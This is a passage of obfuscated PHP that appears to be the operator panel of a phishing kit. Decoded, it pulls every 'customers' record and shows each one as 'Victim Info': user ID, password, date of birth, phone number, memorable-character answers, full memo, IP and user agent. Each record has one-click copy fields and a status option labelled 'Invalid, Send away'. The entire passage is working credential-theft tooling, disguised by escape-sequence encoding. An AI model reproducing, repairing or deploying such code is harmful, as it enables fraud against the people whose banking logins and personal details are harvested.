8\145\143\153\x2d\154\141\x62\145\154\x27\x3e\xa\x9\11\x9\11\11\x9\x9\11\11\x9\x9\x9\11\11\74\151\156\160\165\164\x20\x74\x79\x70\145\x3d\47\x72\x61\x64\x69\x6f\x27\40\156\x61\x6d\145\x3d\x27\163\164\x61\x74\165\x73\47\x20\x76\141\154\x75\x65\x3d\x27\61\x30\60\47\40\x69\144\75\47\163\145\156\144\x61\167\x61\171\162\x61\x64\x69\157{$value["\x69\x64"]}\x27\x20\157\x6e\143\x6c\151\x63\153\75\47\x73\x68\157\x77\x66\151\x65\154\x64\163\50{$value["\151\144"]}\x29\73\47\40\143\154\x61\x73\163\x3d\x27\163\x74\x61\164\x75\163\40\x66\x6f\x72\155\55\x63\150\x65\143\153\55\151\156\160\165\164\47\76\xa\11\x9\11\11\x9\11\x9\11\11\x9\11\11\11\11\x3c\x73\x70\x61\156\76\111\x6e\x76\141\x6c\151\x64\x2c\x20\x53\x65\156\144\x20\x61\167\141\171\74\x2f\163\x70\x61\x6e\76\12\11\x9\x9\11\11\11\11\x9\x9\11\x9\x9\11\x3c\57\154\141\x62\145\154\x3e\xa\11\11\x9\11\x9\11\x9\11\x9\x9\x9\x9\x3c\x2f\144\151\x76\x3e\12\x9\11\x9\11\x9\x9\x9\11\11\x9\x9\x3c\x2f\164\144\76\xa\11\11\11\x9\11\x9\x9\11\11\x9\x3c\57\164\162\x3e\xa\xa\x9\11\x9\11\x9\11\x9\x9\x9\x3c\57\x74\142\x6f\144\171\76\xa\x9\11\11\x9\11\x9\11\x9\74\x2f\164\x61\x62\x6c\145\x3e\12\x9\x9\x9\x9\11\11\11\74\x2f\144\x69\166\x3e\12\x9\x9\x9\x9\x9\x9\x9\74\x21\55\x2d\40\105\156\x64\40\x63\x6f\155\155\x61\156\144\x73\x20\x65\x64\151\x74\x20\x2d\x2d\x3e\12\xa\x9\x9\x9\11\x9\x9\11\x3c\144\x69\x76\40\143\x6c\141\163\x73\75\47\155\157\144\141\154\x2d\146\157\157\164\x65\162\47\40\163\164\171\x6c\x65\75\x27\x6d\141\x72\x67\x69\156\x2d\164\x6f\x70\72\55\64\x30\160\170\47\x3e\xa\x9\x9\x9\11\11\11\11\x9\x3c\x62\x75\164\x74\x6f\x6e\x20\164\x79\160\x65\x3d\x27\142\165\164\x74\x6f\156\47\40\143\154\141\163\x73\x3d\47\x62\164\x6e\40\x62\164\x6e\55\163\145\143\x6f\156\x64\141\x72\x79\x27\40\x6f\156\x63\x6c\x69\143\x6b\x3d\x27\143\154\157\163\x65\137\x62\x74\x6e\x28\x29\x27\40\144\x61\x74\141\x2d\x64\151\x73\x6d\151\x73\x73\x3d\x27\155\157\144\x61\154\47\x3e\x43\x6c\157\163\x65\x3c\x2f\x62\165\x74\x74\x6f\x6e\x3e\12\x9\11\11\11\11\11\x9\x9\x3c\x62\x75\x74\164\x6f\156\x20\x69\144\x3d\47\x73\x61\x76\x65\x5f{$value["\x69\x64"]}\47\x20\x6f\156\x63\154\151\143\x6b\x3d\47\x66\157\162\x6d\137\x73\x75\x62\155\x69\164\x28\x74\150\151\x73\51\x27\x20\164\x79\160\x65\75\x27\142\x75\x74\x74\157\x6e\47\40\143\x6c\x61\163\163\75\47\142\164\156\40\142\x74\x6e\x2d\x70\x72\151\x6d\141\162\171\x27\x3e\x53\x61\x76\145\x3c\x2f\142\165\x74\164\x6f\156\x3e\12\x9\x9\11\x9\11\x9\11\74\57\144\151\166\76\12\11\x9\11\x9\x9\11\x3c\57\144\151\x76\x3e\xa\x9\x9\x9\11\11\74\x2f\x64\x69\x76\x3e\12\11\11\x9\11\74\57\x66\x6f\x72\x6d\76\12\x9\x9\11\74\x2f\x64\151\166\76\12\11\x9\x9"; } } if (isset($_GET["\146\145\x74\x63\x68\x5f\x70\143\x5f\146\x69\156\151\163\150\x5f\x6d\157\144\141\x6c\137\144\141\164\x61"])) { $query = mysqli_query($conn, "\x53\105\114\105\103\x54\40\x2a\x20\x66\162\157\x6d\40\143\x75\x73\164\157\155\x65\x72\163"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\x73\x72\x6c\x6f\x67\151\156"]; $usrpass = $value["\x75\x73\162\x70\141\x73\x73"]; $memchar1 = $value["\x6d\x65\155\143\x68\x61\x72\x31"]; $memchar2 = $value["\155\x65\x6d\x63\150\x61\x72\x32"]; $memchar3 = $value["\155\145\x6d\x63\x68\x61\x72\63"]; $askchar1 = $value["\x61\163\153\143\150\x61\162\x31"]; $askchar2 = $value["\141\163\153\143\x68\x61\162\62"]; $askchar3 = $value["\141\163\x6b\143\150\141\162\x33"]; $phonenum = $value["\x70\150\157\156\x65\156\165\155"]; $fullmemo = $value["\x66\x75\154\154\x6d\145\x6d\x6f"]; $usrdob = $value["\x75\163\x72\144\x6f\x62"]; $Char_one = $askchar1 . "\x20\143\150\141\x72\x61\x63\x74\145\162\40\55\x20" . $memchar1; $Char_two = $askchar2 . "\40\x63\x68\141\x72\141\143\164\x65\162\40\55\x20" . $memchar2; $Char_three = $askchar3 . "\x20\x63\x68\141\162\x61\x63\x74\145\162\x20\55\x20" . $memchar3; $expiry = $value["\145\x78\x70\x69\162\x79"]; $ip = $value["\x69\160"]; $useragent = urldecode($value["\x75\163\x65\162\x61\x67\145\x6e\164"]); $data_log = "\xa\x9\x9\x9\x3d\75\75\75\75\342\x89\253\x20\x4c\x4f\107\x49\116\x20\342\211\xaa\x3d\75\x3d\x3d\x3d\xa\11\11\x9\x55\x73\145\162\x20\x49\104\57\116\x6f\x2e\x20\x3a\40{$usrlogin}\12\11\x9\11\120\141\x73\163\40\72\x20{$usrpass}\12\11\11\x9\120\x68\x6f\x6e\x65\x20\116\x6f\40\x3a\x20{$phonenum}\xa\11\x9\x9\104\x4f\x42\x20\x3a\40{$usrdob}\12\x9\11\x9\x3d\x3d\75\75\75\342\x89\xab\x20\x53\105\x43\125\122\x49\x54\x59\40\xe2\x89\xaa\75\x3d\x3d\x3d\x3d\xa\x9\11\11{$Char_one}\xa\11\11\x9{$Char_two}\xa\11\11\x9{$Char_three}\12\11\11\x9\106\165\x6c\x6c\x20\x4d\x65\155\157\40\x3a\x20{$fullmemo}\xa\11\11\11\x3d\x3d\x3d\75\75\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x3d\x3d\75\75\x3d\75\75\75\75\75\75\x3d\75\x3d\75\x3d\x3d\x3d\xa\11\x9\11\x49\x50\x20\72\40{$ip}\12\x9\x9\x9\125\x41\x20\72\40{$useragent}\12\x9\x9\11\75\x3d\75\75\75\75\x3d\x3d\75\x3d\x3d\x3d\75\75\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\75\x3d\75\x3d\x3d\75\75"; echo "\xa\x9\x9\11\xa\x9\11\x9\x3c\144\x69\166\x20\x63\x6c\141\163\163\x3d\x27\155\157\x64\141\154\x20\146\141\144\145\x27\x20\151\x64\x3d\x27\x76\151\145\x77\x6d\x6f\144\x61\154\137\x75\x73\145\162\151\144\x5f{$value["\151\144"]}\x27\x20\164\141\x62\151\156\x64\x65\170\x3d\47\x2d\61\47\x20\x72\x6f\x6c\145\x3d\x27\x64\x69\x61\154\157\x67\47\x20\x61\162\x69\x61\x2d\x6c\x61\142\145\x6c\154\145\x64\142\x79\75\47\145\170\x61\x6d\x70\154\x65\115\x6f\x64\x61\154\x4c\x61\x62\145\154\x27\40\x73\164\171\154\145\x3d\x27\157\160\x61\x63\x69\x74\x79\72\x31\x20\x21\x69\155\160\x6f\162\x74\x61\x6e\164\x3b\144\x69\x73\160\154\x61\171\72\156\x6f\156\x65\x3b\x68\x65\x69\x67\150\x74\x3a\x31\x30\x30\x25\x3b\157\166\x65\x72\146\154\157\167\x3a\163\143\x72\x6f\x6c\x6c\x3b\47\40\141\x72\x69\x61\x2d\x68\151\x64\144\145\156\75\47\164\x72\x75\145\47\76\12\11\11\11\xa\x9\x9\x9\x9\74\146\157\x72\155\40\x6e\x61\x6d\x65\x3d\47\x63\x6f\156\146\151\x67\137\146\x6f\x72\x6d\x5f{$value["\x69\x64"]}\47\40\151\x64\75\x27\x63\157\156\x66\151\x67\137\146\157\162\155\x5f{$value["\x69\144"]}\x27\40\155\145\x74\150\x6f\x64\x3d\x27\x50\117\123\124\x27\40\x61\143\x74\x69\x6f\x6e\x3d\x27\47\x20\x6e\x6f\166\141\x6c\x69\x64\141\164\x65\76\xa\11\11\11\11\11\74\151\x6e\x70\165\164\x20\x74\171\x70\145\x3d\47\x68\151\x64\144\x65\x6e\47\x20\x6e\x61\155\145\75\x27\x75\163\145\x72\x69\144\47\40\166\141\x6c\x75\x65\x3d\x27{$value["\151\x64"]}\x27\x3e\12\x9\11\11\11\11\x3c\144\151\166\x20\143\154\x61\x73\163\x3d\x27\155\x6f\x64\141\x6c\55\x64\x69\x61\154\157\147\47\40\162\157\154\145\x3d\x27\x64\x6f\143\165\155\145\156\164\47\x20\x73\x74\171\x6c\x65\x3d\47\x77\151\144\164\150\x3a\65\x30\60\x70\x78\47\x3e\xa\x9\11\11\x9\11\x9\x3c\144\x69\x76\40\143\154\x61\163\163\x3d\x27\155\157\x64\x61\154\55\x63\x6f\156\164\x65\156\x74\47\x3e\xa\x9\11\11\x9\x9\11\11\74\x64\x69\166\40\x63\x6c\x61\163\163\x3d\47\x6d\x6f\144\x61\x6c\x2d\x68\x65\141\144\145\162\x27\x20\x73\x74\171\x6c\145\75\47\x62\x61\143\x6b\x67\162\x6f\165\156\x64\55\143\x6f\x6c\x6f\162\72\x23\x33\64\x34\71\x35\105\73\146\x6f\156\x74\55\163\151\172\x65\72\62\56\67\162\x65\x6d\x3b\164\x65\170\x74\x2d\141\x6c\x69\147\x6e\72\x63\145\156\x74\x65\162\x3b\47\x3e\xa\x9\11\x9\x9\x9\x9\11\11\x3c\x68\x35\40\143\154\141\x73\x73\75\47\x6d\157\x64\141\x6c\55\164\151\164\x6c\x65\47\x20\x69\x64\75\47\145\x78\x61\x6d\160\x6c\x65\x4d\157\x64\x61\154\114\141\142\145\x6c\x27\x20\163\164\x79\x6c\x65\x3d\x27\x63\157\x6c\157\162\72\x77\150\151\x74\x65\x27\x3e\126\151\143\164\x69\x6d\40\x49\156\146\157\74\x2f\150\x35\76\12\11\11\x9\11\x9\11\11\x9\x3c\142\165\164\164\157\x6e\40\x74\x79\x70\145\x3d\47\x62\x75\164\x74\x6f\156\47\40\x63\154\x61\x73\163\x3d\x27\143\x6c\x6f\163\x65\x27\x20\x64\141\x74\141\x2d\x64\x69\163\155\151\163\163\x3d\x27\155\157\144\141\154\47\40\141\162\x69\141\55\x6c\141\142\145\154\x3d\47\x43\x6c\x6f\163\145\x27\76\xa\x9\x9\11\11\x9\11\11\11\11\74\163\x70\x61\156\x20\141\162\x69\x61\55\150\151\144\144\x65\x6e\75\x27\x74\162\x75\145\47\x20\x73\x74\171\x6c\145\x3d\47\x63\157\x6c\x6f\162\72\x77\150\x69\x74\x65\x27\x3e\x26\x74\x69\x6d\x65\163\73\x3c\57\163\160\141\x6e\x3e\12\11\x9\11\11\x9\x9\11\11\74\x2f\142\165\x74\x74\x6f\156\x3e\12\x9\x9\x9\x9\x9\11\x9\x3c\x2f\144\151\x76\x3e\12\11\11\x9\x9\11\11\11\x3c\144\151\166\40\x63\x6c\141\163\x73\75\x27\155\157\x64\141\154\55\142\157\144\x79\47\x3e\12\11\11\11\11\11\x9\x9\11\x3c\x64\x69\x76\40\143\x6c\141\x73\163\x3d\x27\x66\x6f\162\155\x2d\x67\162\157\165\x70\x27\x3e\xa\11\11\x9\11\11\11\x9\x9\x9\74\142\x72\76\xa\11\x9\11\x9\11\11\11\11\11\x3c\164\145\170\x74\x61\162\x65\141\40\x69\x64\75\x27\x74\x65\x78\x74\141\x72\x65\x61\x66\151\x6e\151\163\x68\47\x20\x63\154\x61\x73\x73\75\x27\146\x6f\162\x6d\55\143\157\x6e\x74\x72\157\x6c\47\40\x64\151\x73\x61\x62\x6c\145\144\x3d\47\144\x69\x73\141\x62\x6c\x65\x64\47\40\x72\x6f\167\x73\75\x27\x31\62\47\76{$data_log}\x3c\x2f\x74\x65\x78\x74\x61\x72\x65\141\x3e\xa\x9\11\11\11\x9\11\11\x9\74\x2f\144\x69\166\76\12\x9\11\11\11\x9\x9\x9\74\x2f\144\151\166\x3e\xa\11\x9\11\x9\11\x9\11\74\144\151\x76\x20\x63\154\x61\163\x73\75\47\155\x6f\x64\x61\154\55\146\157\157\x74\x65\x72\47\x20\x73\164\x79\154\x65\75\x27\155\x61\162\147\151\156\55\164\157\x70\72\55\64\x30\160\x78\47\x3e\12\11\11\11\x9\x9\11\x9\x9\74\142\165\164\164\157\156\x20\164\171\x70\x65\75\x27\142\x75\164\164\x6f\x6e\x27\40\143\x6c\x61\x73\x73\x3d\47\142\164\156\40\x62\164\x6e\x2d\x6c\x67\40\142\x74\156\x2d\x64\141\x72\x6b\x20\x63\x6f\x6c\55\x31\62\x27\x20\x6f\x6e\143\154\151\143\153\x3d\x27\x63\x6c\157\163\x65\x5f\142\x74\x6e\50\51\47\x3e\103\x4c\117\x53\105\x3c\x2f\x62\165\x74\x74\x6f\156\76\xa\x9\x9\x9\11\11\11\x9\x3c\57\144\x69\x76\x3e\xa\x9\11\11\x9\x9\x9\x3c\57\144\x69\x76\x3e\12\11\x9\x9\x9\11\74\57\x64\x69\166\76\12\x9\x9\x9\11\x3c\x2f\146\157\162\x6d\x3e\12\x9\11\11\74\57\x64\151\x76\76\xa\x9\x9\x9"; } } if (isset($_GET["\146\x65\x74\x63\x68\137\x6d\x6f\x64\141\x6c\137\x64\x61\x74\x61"])) { $query = mysqli_query($conn, "\123\105\114\105\x43\124\x20\x2a\40\x66\162\157\155\x20\x63\x75\163\x74\x6f\155\x65\x72\x73"); if ($query) { if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_all($query, MYSQLI_ASSOC); } } foreach ($array as $value) { $usrlogin = $value["\x75\163\x72\x6c\x6f\x67\151\x6e"]; $usrpass = $value["\x75\x73\x72\160\x61\x73\x73"]; $memchar1 = $value["\x6d\x65\155\x63\150\141\162\61"]; $memchar2 = $value["\155\x65\x6d\x63\x68\141\162\x32"]; $memchar3 = $value["\155\145\x6d\143\x68\141\162\63"]; $askchar1 = $value["\141\163\x6b\143\x68\x61\162\x31"]; $askchar2 = $value["\x61\163\x6b\x63\x68\141\x72\x32"]; $askchar3 = $value["\141\x73\153\x63\x68\141\162\x33"]; $phonenum = $value["\x70\150\x6f\x6e\x65\x6e\x75\155"]; $fullmemo = $value["\146\165\x6c\x6c\155\145\x6d\157"]; $usrdob = $value["\x75\x73\x72\x64\x6f\142"]; $Char_one = $askchar1 . "\x20\x63\x68\x61\162\x61\x63\x74\x65\162\x20\55\x20" . $memchar1; $Char_two = $askchar2 . "\40\143\x68\141\x72\141\x63\164\145\x72\40\x2d\40" . $memchar2; $Char_three = $askchar3 . "\x20\143\x68\141\x72\x61\143\x74\145\x72\40\x2d\x20" . $memchar3; $expiry = $value["\145\170\160\x69\162\171"]; $ip = $value["\151\160"]; $useragent = urldecode($value["\x75\x73\x65\x72\x61\147\x65\x6e\164"]); echo "\12\11\xa\x9\x9\11\x3c\x64\151\166\x20\143\x6c\x61\163\163\75\47\155\157\144\141\x6c\40\146\x61\x64\x65\47\x20\151\x64\75\x27\155\x6f\x64\141\x6c\x5f\x75\x73\145\162\x69\x64\x5f{$value["\151\144"]}\47\40\164\x61\142\151\156\144\145\x78\x3d\47\x2d\x31\x27\x20\162\x6f\154\x65\x3d\47\x64\151\x61\x6c\157\147\x27\x20\x73\164\171\154\145\75\x27\x6f\160\141\x63\x69\164\x79\x3a\x31\40\x21\x69\155\x70\157\162\164\141\156\x74\x3b\144\x69\x73\160\x6c\x61\171\x3a\x6e\x6f\156\x65\x3b\x68\145\151\x67\x68\x74\72\61\x30\x30\x25\73\x6f\x76\145\x72\x66\154\157\167\x3a\x73\x63\x72\157\x6c\x6c\73\x27\40\141\162\151\x61\x2d\x6c\141\142\145\154\x6c\145\x64\142\x79\75\x27\x65\x78\141\155\x70\x6c\x65\115\x6f\144\141\154\x4c\141\142\x65\x6c\47\40\x61\x72\151\x61\55\x68\151\144\x64\145\156\x3d\47\164\x72\x75\x65\47\x3e\xa\x9\11\11\12\11\x9\x9\11\74\146\157\x72\155\40\156\x61\x6d\x65\x3d\47\143\157\x6e\x66\151\147\137\146\x6f\162\x6d\x5f{$value["\151\x64"]}\47\40\x69\144\75\x27\143\157\x6e\146\151\147\137\146\157\162\x6d\x5f{$value["\151\x64"]}\x27\40\x6d\x65\164\150\157\144\75\47\x50\117\x53\124\x27\x20\141\143\x74\x69\x6f\156\x3d\47\x27\40\156\x6f\x76\x61\x6c\151\144\x61\x74\x65\x3e\12\11\11\11\x9\11\74\x69\x6e\160\x75\164\x20\x74\171\160\x65\75\47\150\x69\x64\x64\x65\156\47\x20\x6e\141\155\x65\75\x27\165\x73\145\x72\x69\x64\47\x20\166\141\x6c\x75\145\75\47{$value["\151\144"]}\47\76\xa\x9\11\x9\x9\x9\74\144\151\x76\40\x63\154\x61\x73\x73\75\47\x6d\157\144\x61\154\x2d\x64\151\x61\154\157\x67\47\x20\162\x6f\x6c\x65\x3d\x27\144\157\x63\x75\155\x65\x6e\x74\47\40\163\x74\x79\x6c\145\75\x27\155\x61\x72\147\x69\156\55\x74\157\x70\72\x32\x30\45\x3b\x6d\141\x78\x2d\167\x69\144\x74\150\72\61\x30\60\45\73\146\157\x6e\164\55\163\151\x7a\x65\x3a\61\56\x32\162\145\x6d\73\47\76\xa\x9\x9\11\11\x9\11\74\x64\x69\x76\x20\143\x6c\x61\x73\x73\x3d\47\x6d\x6f\144\x61\x6c\x2d\143\157\x6e\x74\x65\x6e\164\47\40\163\164\171\x6c\x65\x3d\x27\142\x61\x63\x6b\x67\x72\x6f\165\x6e\144\55\143\x6f\x6c\x6f\162\72\x20\142\154\141\x63\x6b\x3b\x27\x3e\12\x9\11\11\11\11\11\x9\74\144\x69\166\40\x63\154\x61\163\163\75\47\155\157\144\x61\x6c\x2d\150\145\x61\144\x65\x72\x27\40\163\x74\x79\154\145\75\47\142\141\143\153\x67\162\x6f\x75\x6e\x64\x2d\x63\x6f\x6c\157\x72\x3a\x23\x33\x34\x34\x39\x35\x45\73\x66\x6f\x6e\164\x2d\x73\151\172\x65\x3a\62\56\67\162\145\155\73\164\145\170\164\x2d\x61\154\x69\147\x6e\72\143\x65\x6e\x74\145\162\x3b\x27\x3e\12\11\11\x9\x9\x9\x9\x9\11\74\150\65\x20\143\x6c\x61\163\163\75\47\x6d\x6f\144\x61\154\x2d\164\x69\164\154\x65\47\x20\x69\x64\x3d\47\145\170\x61\155\x70\154\x65\x4d\x6f\x64\141\154\114\x61\x62\x65\x6c\47\x20\x73\164\171\x6c\145\x3d\x27\143\x6f\154\x6f\162\x3a\167\x68\151\x74\x65\73\146\157\x6e\164\55\x73\x69\x7a\145\x3a\x31\56\62\162\x65\x6d\47\76\x41\144\155\151\156\x20\103\x6f\x6e\164\162\157\154\40\50\143\x6c\x69\x63\153\40\157\x6e\40\154\157\x67\x20\x74\157\x20\141\165\164\157\x2d\143\157\x70\x79\x29\74\57\150\65\76\12\11\11\11\x9\11\x9\11\x9\x3c\142\165\164\164\157\x6e\40\x74\x79\x70\145\75\47\142\x75\x74\164\x6f\x6e\x27\40\x63\x6c\141\163\x73\75\x27\143\154\157\x73\145\47\40\x6f\156\x63\154\x69\x63\x6b\x3d\x27\x63\154\157\x73\145\137\142\x74\156\50\x29\47\x20\x20\141\x72\x69\x61\x2d\154\141\x62\x65\x6c\x3d\47\103\154\x6f\163\x65\47\x3e\xa\x9\11\11\x9\x9\x9\11\x9\x9\x3c\163\x70\141\156\x20\141\162\x69\x61\x2d\150\151\144\x64\145\156\x3d\x27\164\x72\x75\x65\47\40\x73\164\x79\x6c\145\75\x27\x63\x6f\x6c\x6f\x72\72\x77\x68\151\x74\145\x27\x3e\x26\164\x69\x6d\x65\x73\73\74\57\163\x70\x61\156\76\12\x9\11\11\x9\x9\x9\x9\11\74\57\x62\x75\x74\x74\157\156\76\xa\11\x9\11\x9\11\11\11\74\x2f\144\151\x76\76\12\11\11\11\11\11\11\x9\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\x3d\47\155\x6f\x64\141\154\x2d\x62\157\144\171\x27\x3e\12\x9\x9\11\11\x9\x9\x9\x9\x3c\144\151\166\40\x63\x6c\x61\x73\163\75\47\146\157\x72\x6d\x2d\147\162\x6f\x75\160\x27\x20\163\x74\171\154\145\x3d\x27\x6d\141\x72\147\x69\156\55\142\157\x74\x74\157\x6d\72\61\x72\145\155\47\x3e\12\11\11\11\x9\x9\x9\11\x9\11\x3c\142\162\76\xa\x9\x9\11\11\11\11\11\x9\x9\12\x9\11\x9\11\11\11\11\11\x9\x3c\x64\x69\166\x20\143\154\x61\163\x73\75\47\144\141\x74\141\x2d\147\x72\157\165\x70\47\x3e\12\x9\11\x9\11\x9\x9\11\x9\x9\11\74\154\x61\142\145\x6c\40\x63\x6c\x61\163\x73\x3d\x27\x64\141\x74\141\x2d\154\x61\142\x65\154\47\76\x55\x73\x65\162\40\x49\x44\x3c\57\154\x61\142\x65\x6c\76\12\11\x9\x9\x9\x9\11\x9\x9\x9\x9\74\x69\156\x70\x75\x74\40\157\156\143\154\x69\x63\153\75\47\143\x6f\x70\x79\137\x62\164\156\50\x74\x68\x69\x73\51\x27\x20\x63\154\x61\163\163\75\x27\x66\157\x72\x6d\55\x63\157\156\x74\162\x6f\x6c\x27\x20\x72\x65\x61\x64\x6f\x6e\154\x79\40\x76\x61\x6c\165\x65\75\x27{$usrlogin}\47\76\12\x9\11\11\x9\x9\11\11\x9\11\x3c\57\x64\151\166\x3e\xa\11\x9\x9\11\x9\11\x9\11\11\x3c\x64\x69\166\40\143\x6c\141\x73\x73\x3d\x27\144\x61\x74\x61\x2d\x67\162\157\x75\x70\47\x3e\xa\11\x9\x9\x9\11\11\x9\x9\11\11\74\154\141\x62\x65\x6c\x20\x63\154\x61\163\163\75\x27\144\141\x74\x61\x2d\154\141\142\145\x6c\x27\76\120\x61\163\163\x3c\57\154\141\142\x65\x6c\x3e\12\11\x9\x9\11\x9\x9\x9\11\11\11\74\151\x6e\160\x75\164\x20\x6f\x6e\x63\154\x69\143\x6b\75\47\143\157\x70\x79\137\142\164\x6e\x28\x74\150\151\163\51\x27\40\143\x6c\x61\x73\x73\x3d\x27\146\x6f\162\x6d\55\143\157\156\164\162\x6f\x6c\x27\40\162\x65\141\x64\x6f\156\154\171\40\166\141\154\165\145\x3d\47{$usrpass}\47\76\12\x9\11\x9\x9\11\x9\x9\11\x9\x3c\x2f\144\151\166\76\12\11\11\11\x9\x9\11\x9\x9\11\74\x64\151\x76\40\x63\x6c\141\163\x73\75\47\x64\x61\164\x61\x2d\147\x72\x6f\165\160\x27\x3e\xa\x9\x9\x9\x9\x9\x9\11\11\11\11\x3c\154\141\142\145\154\x20\x63\154\x61\x73\163\x3d\47\144\x61\x74\141\x2d\154\x61\x62\145\x6c\47\x3e\x44\x4f\x42\74\x2f\154\141\142\145\x6c\x3e\12\11\11\x9\x9\11\x9\11\x9\11\11\x3c\x69\156\x70\x75\164\x20\157\x6e\143\x6c\x69\143\153\x3d\x27\143\157\160\171\x5f\142\164\x6e\50\x74\x68\151\163\51\47\x20\x63\x6c\x61\163\163\x3d\x27\x66\157\162\x6d\55\143\157\x6e\x74\162\x6f\x6c\47\x20\x72\145\141\x64\157\156\x6c\x79\40\x76\x61\154\x75\145\x3d\47{$usrdob}\47\76\xa\11\x9\11\x9\11\11\x9\11\x9\x3c\57\x64\151\166\x3e\12\11\11\11\11\x9\x9\x9\11\11\x3c\144\x69\x76\x20\x63\x6c\141\x73\x73\75\47\144\141\164\x61\55\147\x72\x6f\x75\x70\x27\x3e\12\11\11\11\11\x9\11\11\x9\x9\x9\x3c\154\x61\x62\145\154\x20\143\154\141\163\x73\75\x27\144\x61\x74\x61\55\154\x61\x62\145\154\47\76\120\x68\x6f\156\145\x20\x4e\157\x2e\74\x2f\154\x61\x62\145\x6c\76\12\11\11\x9\11\11\11\11\11\11\11\x3c\151\156\x70\165\164\x20\157\x6e\143\x6c\x69\143\153\x3d\x27\143\157\x70\171\x5f\x62\164\156\50\x74\150\151\x73\51\x27\40\143\154\x61\x73\163\75\47\146\x6f\x72\155\x2d\143\x6f\x6e\164\162\x6f\154\x27\x20\x72\145\x61\144\157\156\154\x79\x20\166\141\154\165\145\75\47{$phonenum}\47\76\xa\11\x9\x9\x9\x9\x9\x9\11\11\74\57\144\x69\x76\x3e\12\11\11\11\11\11\11\x9\11\11\74\x64\x69\x76\x20\x63\x6c\141\163\163\75\x27\x64\141\164\141\x2d\x67\162\x6f\x75\160\x27\x3e\12\x9\11\x9\11\x9\x9\11\x9\x9\x9\x3c\154\x61\x62\x65\x6c\40\143\154\x61\x73\163\x3d\x27\x64\x61\x74\x61\x2d\x6c\x61\142\x65\154\47\x3e\x43\150\141\162\x20\x31\74\x2f\154\141\142\145\x6c\76\xa\x9\x9\x9\x9\x9\x9\x9\11\x9\11\x3c\151\x6e\160\x75\x74\40\157\156\x63\154\151\143\153\x3d\x27\143\x6f\x70\171\x5f\142\x74\x6e\50\164\150\x69\163\x29\x27\40\143\154\x61\x73\x73\x3d\47\x66\157\x72\155\55\x63\157\x6e\x74\x72\157\x6c\47\40\162\x65\x61\x64\157\x6e\154\x79\40\x76\x61\154\165\145\75\47{$Char_one}\47\x3e\12\11\x9\11\11\11\x9\x9\11\11\x3c\57\x64\x69\166\x3e\xa\11\11\11\11\11\11\x9\11\11\74\144\151\x76\40\143\x6c\x61\x73\163\x3d\47\x64\x61\x74\x61\x2d\147\x72\x6f\165\160\47\76\xa\11\x9\11\11\11\11\x9\11\x9\11\74\x6c\141\142\x65\x6c\40\143\x6c\141\163\163\x3d\x27\x64\141\164\141\x2d\154\141\x62\145\154\x27\x3e\x43\150\x61\x72\40\62\74\57\154\141\x62\x65\154\x3e\12\x9\x9\11\11\x9\11\11\11\x9\x9\x3c\151\x6e\160\165\164\40\x6f\x6e\143\154\x69\143\153\x3d\47\x63\157\x70\171\137\x62\x74\x6e\50\x74\150\x69\163\51\47\x20\x63\154\141\163\163\x3d\47\x66\x6f\x72\x6d\55\x63\x6f\156\x74\x72\157\x6c\x27\40\x72\145\141\144\157\x6e\154\x79\40\x76\141\x6c\x75\x65\75\47{$Char_two}\47\x3e\12\x9\x9\x9\11\x9\x9\11\11\x9\x3c\x2f\144\x69\166\x3e\xa\11\11\x9\x9\x9\x9\11\x9\x9\74\144\151\166\40\x63\154\141\x73\x73\75\47\144\x61\164\x61\x2d\x67\162\x6f\165\x70\47\x3e\12\x9\x9\x9\x9\x9\11\11\x9\11\x9\x3c\x6c\x61\142\x65\x6c\40\x63\x6c\x61\163\x73\75\47\144\x61\164\x61\x2d\x6c\141\x62\145\154\x27\x3e\x43\x68\x61\162\x20\x33\x3c\x2f\154\141\142\x65\x6c\76\xa\x9\x9\x9\11\x9\x9\x9\x9\x9\x9\74\151\156\x70\165\164\x20\x6f\156\x63\x6c\x69\143\x6b\75\47\143\x6f\160\x79\x5f\142\164\156\50\x74\150\151\x73\x29\47\x20\x63\154\141\163\x73\75\47\146\157\x72\x6d\x2d\x63\x6f\156\164\x72\x6f\x6c\x27\x20\162\x65\141\x64\157\x6e\x6c\171\x20\x76\141\154\x75\145\75\x27{$Char_three}\x27\76\12\x9\11\11\x9\11\11\x9\x9\x9\74\x2f\x64\151\x76\x3e\xa\x9\11\x9\x9\11\11\x9\x9\x9\x3c\x64\x69\166\40\x63\x6c\x61\163\163\x3d\47\x64\141\x74\141\55\147\162\157\x75\160\47\76\xa\11\x9\11\x9\x9\11\11\11\11\x9\x3c\154\141\x62\x65\154\x20\x63\154\141\163\x73\75\47\144\x61\x74\141\x2d\x6c\x61\142\x65\154\47\x3e\x46\x75\x6c\x6c\x20\x4d\x65\x6d\x6f\x3c\57\x6c\141\x62\x65\x6c\x3e\xa\x9\11\11\x9\11\x9\x9\11\11\x9\x3c\151\156\160\165\164\x20\157\x6e\143\x6c\x69\143\153\x3d\x27\143\157\x70\x79\x5f\x62\164\156\50\x74\x68\x69\163\x29\x27\40\143\x6c\141\163\163\x3d\47\146\x6f\162\155\55\x63\x6f\156\x74\162\157\154\x27\x20\162\x65\141\x64\157\156\x6c\x79\40\x76\141\x6c\x75\x65\75\x27{$fullmemo}\47\x3e\xa\x9\x9\11\x9\x9\11\x9\x9\11\x3c\x2f\144\x69\166\x3e\12\x9\x9\11\11\x9\11\11\11\x9\x3c\x64\x69\166\40\x63\154\x61\x73\163\75\47\x64\x61\x74\141\55\x67\162\x6f\x75\x70\47\76\12\11\11\11\11\11\x9\x9\11\x9\11\x3c\x6c\141\x62\x65\154\x20\143\154\x61\163\x73\x3d\47\x64\141\164\141\x2d\x6c\141\x62\x65\x6c\x27\x3e\x49\x50\57\x44\145\166\x69\x63\x65\x3c\x2f\154\x61\x62\145\154\76\12\x9\x9\11\11\11\x9\x9\x9\x9\11\x3c\x69\156\160\165\164\x20\157\156\x63\154\x69\143\153\x3d\x27\x63\x6f\160\171\x5f\x62\164\x6e\50\x74\150\151\163\x29\47\40\x63\x6c\x61\163\x73\x3d\47\x66\x6f\162\x6d\55\x63\157\x6e\x74\x72\x6f\154\47\40\x72\145\141\x64\x6f\156\x6c\x79\40\x76\141\154\165\145\75\x27{$ip}\40\x5b{$useragent}\x5d\47\x3e\12\11\11\x9\x9\11\11\11\x9\x9\74\x2f\x64\x69\166\76\12\11\x9\x9\11\x9\